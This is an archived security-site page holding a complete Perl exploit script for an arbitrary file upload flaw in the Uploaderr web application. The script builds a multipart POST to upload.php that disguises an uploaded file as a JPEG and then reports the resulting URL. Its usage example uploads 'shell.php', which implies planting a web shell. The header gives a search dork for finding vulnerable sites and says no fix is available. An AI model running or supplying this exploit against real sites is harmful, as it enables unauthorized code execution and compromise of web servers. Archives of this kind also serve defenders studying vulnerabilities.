what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Uploaderr Arbitrary File Upload

Uploaderr Arbitrary File Upload
Posted Aug 6, 2009
Authored by r3dm0v3 | Site r3dm0v3.persianblog.ir

Uploaderr remote arbitrary file upload exploit.

tags | exploit, remote, arbitrary, file upload
SHA-256 | 8938105dc52c4f3ed77632d06840917ac648d83ac2384c95e4749d61ee928890

Uploaderr Arbitrary File Upload

Change Mirror Download
#!/usr/bin/perl
#################################################################
#Title: Uploaderr Remote Arbitrary File Upload Exploit #
# #
#Credit: r3dm0v3 #
# http://r3dm0v3.persianblog.ir #
# r3dm0v3[4t]yahoo[dot]com #
# Tehran - Iran #
# #
#Vendor: http://www.uploaderr.com/ #
#Price: 9.95$ #
#Remote: Yes #
#Dork: "Powered by Uploaderr" #
#Fix: Not Available #
# #
#Special thx: Neo limpizik_neo[4t]yahoo[dot]com #
#################################################################

$maxfilesize=250000;
$port=80;

use IO::Socket;

&Banner();

if (@ARGV < 2) {
&Usage();
exit(1);
}

$path = $ARGV[0];
if (substr($path,length($path)-1,1) ne "/"){
$path.="/";
}

$url=$path;
if (lc($url)=~/http:\/\//){
lc($url) =~ /http:\/\/([a-zA-Z0-9.\/_-]+)/;
$url= $1;
}
else{
$url =~ /([a-zA-Z0-9.\/_-]+)/;
$url= $1;
}
$url =~ /([a-zA-Z0-9-_.]+)/;
$host=$1;
$url=~s/$host//;
$file=$ARGV[1];

print "[+] Connecting to $host\n";

open(FILETOUPLOAD,$file) || die "Can not open the file: $!\n";
@filecontent=<FILETOUPLOAD>;
close(FILETOUPLOAD);

$content="-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n".
$maxfilesize."\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"userfile\"; filename=\"".$file."\"\n".
"Content-Type: image/jpeg\n\n".
"@filecontent\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"upload\"\n\n".
"true\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"submitbutton\"\n\n\n".
"-----------------------------7d92ce322fc0564--\n";
$req="POST ".$url."upload.php HTTP/1.1\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d92ce322fc0564\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\n".
"Host: ".$host."\n".
"Content-Length: ".length($content)."\n".
"Connection: Close\n".
"Cache-Control: no-cache\n\n".
$content;

$connect = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "Cannot connect to $host: $!\n";
print $connect $req;
while (<$connect>) {
$response.=$_;
}

$response=~ /.+input onclick="javascript:this\.select\(\);" type="text" value="([a-zA-Z0-9.\/:_-]+)" readonly.+/;
$uploadedFile=$1;
if ($uploadedFile){
print "[+] File uploaded: ".$uploadedFile."\n";
}else{
print "[!] Failed.\n";
}


sub Banner{
print "############################################################\n".
"# Uploaderr Remote Arbitrary File Upload Exploit #\n".
"# by r3dm0v3 #\n".
"# r3dm0v3[4t]yahoo[.]com #\n".
"# http://r3dm0v3.persianblog.ir #\n".
"############################################################\n";
}

sub Usage(){
print "\n Usage: uploaderr.pl <host&path> <local_file>\n";
print " ex. : uploaderr.pl site.com/upload/ shell.php\n";
}
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    0 Files
  • 3
    May 3rd
    0 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close